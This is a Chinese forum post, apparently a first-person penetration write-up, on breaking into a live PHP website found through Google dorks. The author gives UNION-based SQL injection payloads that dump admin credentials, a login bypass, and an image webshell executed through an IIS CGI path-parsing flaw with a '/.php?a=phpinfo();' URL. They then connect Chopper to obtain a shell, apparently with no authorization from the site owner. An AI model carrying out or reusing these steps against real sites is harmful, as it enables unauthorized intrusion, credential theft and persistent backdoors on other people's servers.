一次从简单的SQL注入到后台getshell

• 0X00
  第一次在社区写帖子，不知道开始应该怎么写，好了闲话少说了，直接开始正题。
  在使用谷歌语法寻找网站的时候遇到了一个比较奇怪的网站
  http://xxxxxx.php?id=94
  标准的id=94，既然已经遇到了，那么相遇就是缘分，自然少不了被测试一遍。
  直接 一个单引号 ‘ 测试是字符型，还是数字型。 传入一个简单的单引号后，页面也是直接报错，那么这个地方肯定就是存在SQL注入的。
  
  于是 熟悉的order by 1 正常
  
  Order by 2 直接报错，居然只有一个表
  
  回显点只有一个，那就直接输入 and 1=2 union select database() 数据库直接出现
  
  知道库名以后直接输入表名
  And 1=2 union select group_concat(table_name) from information_schema.tables where table_schema=database()
  
  出现了tab_admin 这个表，查询这个表里面的字段
  And 1=2 union select group_concat(column_name) from information_schema.columns where table_name=”tab_admin”
  
  知道字段以后肯定是想要知道里面的数据
  And 1=2 union select username from tab_admin

And 1=2 union select password from tab_admin
  

当知道管理的账户和密码就是想要进入后台看一看（只是看一看哈）

直接使用御剑后台扫描来检测
http://xxxxxx/login.php

0x01
然后就这样登陆这个网站的后台，如果我自己的眼光与技术已经到这里结束了，感谢Wenz 兄弟的提醒，还是要检查一下后台有没有GETshell的可能。

万能密码在这里居然也可以使用（简直比靶场还要靶场。。。）

发现一个可以上传照片的功能，图片马直接安排（这里 一定不能点 提交 ， 点击提交后就会直接发布在目标的网站）

在burp里面把后缀改成php，放包，一个弹窗发现是白名单，只能上传JPG,NPG等图片格式
![]

随后想起来00截断，但是经过测试也是不能成功，本以为已经到此位置了。再次经过Wenz兄弟的提醒，想起来了CGI解析漏洞。因为这个网站是IIS 8.5的版本，所以IIS6.0的三个畸形解析漏洞一直没有考虑，也忘记了威力强大的CGI解析漏洞。在这里被上了一课，渗透测试一定要去测试所有可能。

之后就是直接上传一张图片马，这里把图片马上传到他的服务器后，一定不要点击 提交 按钮。点击提交就会直接发送到他的网站首页上面

把图片的地址复制一下，然后在后面加上/.php 这个CGI的解析漏洞就出现了
http://xxxxxxx53961.jpg/.php?a=phpinfo();

到这里就是可以直接连接菜刀，成功拿到了webshell
![]
在经过看wwwroot目录的时候发现这是一个站群
![]
Cmd看一下权限是一个最低的权限，而且本机一个补丁也没有打，看来也是一个没有经历过社会毒打的人。

对这个站的渗透也到此结束，如果再进行提权就是违规渗透，这是不能允许的。